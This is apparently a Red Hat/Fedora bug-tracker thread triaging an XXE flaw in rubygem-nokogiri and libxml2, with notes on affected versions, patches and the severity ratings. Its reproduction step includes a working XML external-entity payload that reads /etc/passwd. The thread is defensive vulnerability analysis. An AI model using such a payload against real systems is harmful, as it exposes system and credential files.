Created rubygem-nokogiri tracking bugs for this issue:

Affects: fedora-19 [bug 1178971]
Affects: epel-all [bug 1178972]

Fedora (and perhaps EPEL) uses external libxml2, not bundled libxml2, so this should not affect Fedora (and perhaps EPEL) rubygem-nokogiri. Would you confirm?

By the way Fedora 19 gets EOL today.
https://lists.fedoraproject.org/pipermail/announce/2014-December/003243.html

(In reply to Mamoru TASAKA from comment #2)
> Fedora (and perhaps EPEL) uses external libxml2, not bundled libxml2, so
> this should not affect Fedora (and perhaps EPEL) rubygem-nokogiri. Would you
> confirm?

Hello, I had a look at the EPEL-7 package and it does bundle libxml2, specifically version 2.8.0. This version is also listed in the dependencies.yml file. Also, from the GitHub comment pasted in comment #0:

"""
People using a system-provided libxml2 library that is < 2.9.0 will still be vulnerable no matter what version of Nokogiri they are using. People using a system-provided libxml2 library is that >= 2.9.2 will be patched no matter what version of Nokogiri they are using.
"""

That means that even if Nokogiri uses the system-provided library and not the bundled one, it would use the 2.6.26 on EL5 and 2.7.6 on EL6, both of which are vulnerable. EL7 uses libxml 2.9.1, which means Nokogiri should be updated to 1.6.4 at least (unless libxml is updated to 2.9.2).

And yes, the Fedora tracker can be closed as of today :)

How to reproduce:

> require 'nokogiri'
> d=Nokogiri::XML.parse("<!DOCTYPE root [ <!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<root><e>&ent;</e></root>")
> d.children.children.children.text

Should not return contents of /etc/passwd, but empty string.


Analysis:

For this to be exploitable both Nokogiri and libxml2 that it uses must be vulnerable. Up until 1.6.0 Nokogiri used system libxml2, from that version upwards upstream bundles libxml2 together with Nokogiri, but gives an option to use system libxml2 anyway. Last but not least, the entity expansion has been issue in the libxml2 itself, and patches for those issues prevent this Nokogiri issue too. For details read on.

There are two flaws in Nokogiri and underlying libxml2:
* general XXE attack
* parameter expansion attack

The parameter expansion attack is fixed by Nokogiri by introducing NONET patch in 1.5.4 disallowing network connections, and libxml 2.9.2. Additionally, patch for CVE-2014-0191 (see bug 1090976) also prevents parameter expansion attack.

The general XXE attack is fixed in:
* Nokogiri 1.5.4 by NONET patch, but still allows inclusion of local files
* libxml2 2.9.0 contains bugfix: Do not fetch external parsed entities
* libxml2 2.9.2 contains security fix: CVE-2014-0191 Do not fetch external parameter entities
* the fixes for two issues above were backported to RHEL-6 in libxml2-2.7.6-9.el6 and libxml2-2.7.6-15.el6

Statement:

This issue affects the versions of ruby193-rubygem-nokogiri as shipped with Red Hat Satellite 6 and Red Hat OpenStack 6. Red Hat Product Security has rated this issue as having moderate security impact. A future update may address this issue.

Red Hat Product Security has rated this issue as having no security impact for rubygem-nokogiri as shipped with: Red Hat Enterprise MRG 2.5, Red Hat Subscription Asset Manager 1.3, Red Hat CloudForms Management Engine 5.3.0, Red Hat OpenShift Enterprise 2.2.0; for ruby193-rubygem-nokogiri as shipped with Red Hat Satellite 6, Red Hat Subscription Asset Manager 1.3, Red Hat CloudForms Management Engine 5.3.0, Red Hat OpenStack 4.0, Red Hat OpenStack Foreman, Red Hat OpenStack 6, Red Hat OpenShift Enterprise 2.2.0; and for mingw-rubygem-nokogiri as shipped with Red Hat CloudForms Management Engine 5.3.0. This issue is not currently planned to be addressed in future updates.

For additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/.